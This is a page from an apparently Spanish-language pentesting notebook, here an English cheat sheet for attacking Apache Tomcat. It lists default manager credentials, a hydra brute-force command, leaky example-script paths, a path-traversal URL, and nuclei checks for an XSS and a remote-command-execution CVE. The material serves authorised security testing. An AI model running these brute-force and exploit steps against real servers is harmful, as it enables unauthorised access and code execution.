📚
Vulnerabilidades
  • Symfony
  • Inadecuada configuración de certificados digitales
  • CSRF
  • WAF Bypassing with Unicode Compatibility
  • SSRF
  • Nginx misconfigurations
  • Oracle
  • Advanced CORS Exploitation Techniques
  • Tomcat
    • Apache Example Servlet leads to $
    • Pentest Tomcat
  • Command Injection
  • Nessus
  • Cisco phone systems
  • Windows
  • Recon Avanzado
    • Spring Boot Actuators
    • /env and bypass 403
  • XSS
    • Basic XSS Encoding Tips
    • En upload SVG
    • XSS con llamadas a funciones Javascript
    • Payloads Prohibidos
    • One shot payload sql and xss
    • Bug Bounty
      • XSS Payload en cabecera
    • CKEditor 4
  • ORACLE BI
  • SAP Pentest
    • Exploit
  • SQLi Avanzado
    • En APIs
    • Exploiting SQL injection with no space
      • Blind
    • Metodología
    • Uso de SQL Injection para realizar ataques SSRF/XSPA
  • Wifi Hacking
    • Preparando el ambiente
  • Cloudflare Bypass
    • Cómo evitar Cloudflare en 2023
    • Omitir Cloudflare WAF con la dirección IP del servidor de origen
    • Bypass 2
    • Bypass 1
  • Bypass 2FA Mechanism
  • Bug Bounty
    • Bypasses
    • Autenticación
    • Extensiones
    • XXE
  • ¡La mentalidad de Pentester!
  • Nuclei
  • Revisión externa
    • Funcionamiento de la web
    • Manipulación de parámetros
    • Inyección de secuencias de comandos
  • Ingeniería Social
    • Error de Google - 535-5.7.8 Nombre de usuario y contraseña no aceptados
    • Phishing práctico con Gophish
    • Gophish "Marco de phishing de código abierto"
  • Otros
    • Hackeando metasploit con metasploit
  • NFS Mount
  • CAPTCHA Bypass
Powered by GitBook
On this page
  • Default credentials
  • Bruteforce
  • vulnerability
  • Path Traversal (..;/)
  • Apache Tomcat Snoop Servlet Remote Information Disclosure
  • Apache Tomcat - Cross-Site Scripting
  • Apache Tomcat Remote Command Execution
  • tomcat scanning tools
  • refrences

Was this helpful?

  1. Tomcat

Pentest Tomcat

PreviousApache Example Servlet leads to $NextCommand Injection

Last updated 2 years ago

Was this helpful?

Default credentials

The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are:

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

Bruteforce

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

vulnerability

Example Scripts Information Leakage

The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.

/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal (..;/)

http://www.vulnerable.com/;param=value/manager/html

Apache Tomcat Snoop Servlet Remote Information Disclosure

https://target:ip/examples/jsp/snp/snoop.jsp

Apache Tomcat - Cross-Site Scripting

nuclei -u target  -t CVE-2019-0221.yaml

Apache Tomcat Remote Command Execution

nuclei -u target  -t CVE-2020-9484.yaml

tomcat scanning tools

sudo python3 -m pip install apachetomcatscanner
apachetomcatscanner -tt target_ip -tp port    --no-check-certificate

refrences

https://github.com/kh4sh3i/Apache-Tomcat-Pentesting
scan for Apache Tomcat
Apache Tomcat Example Scripts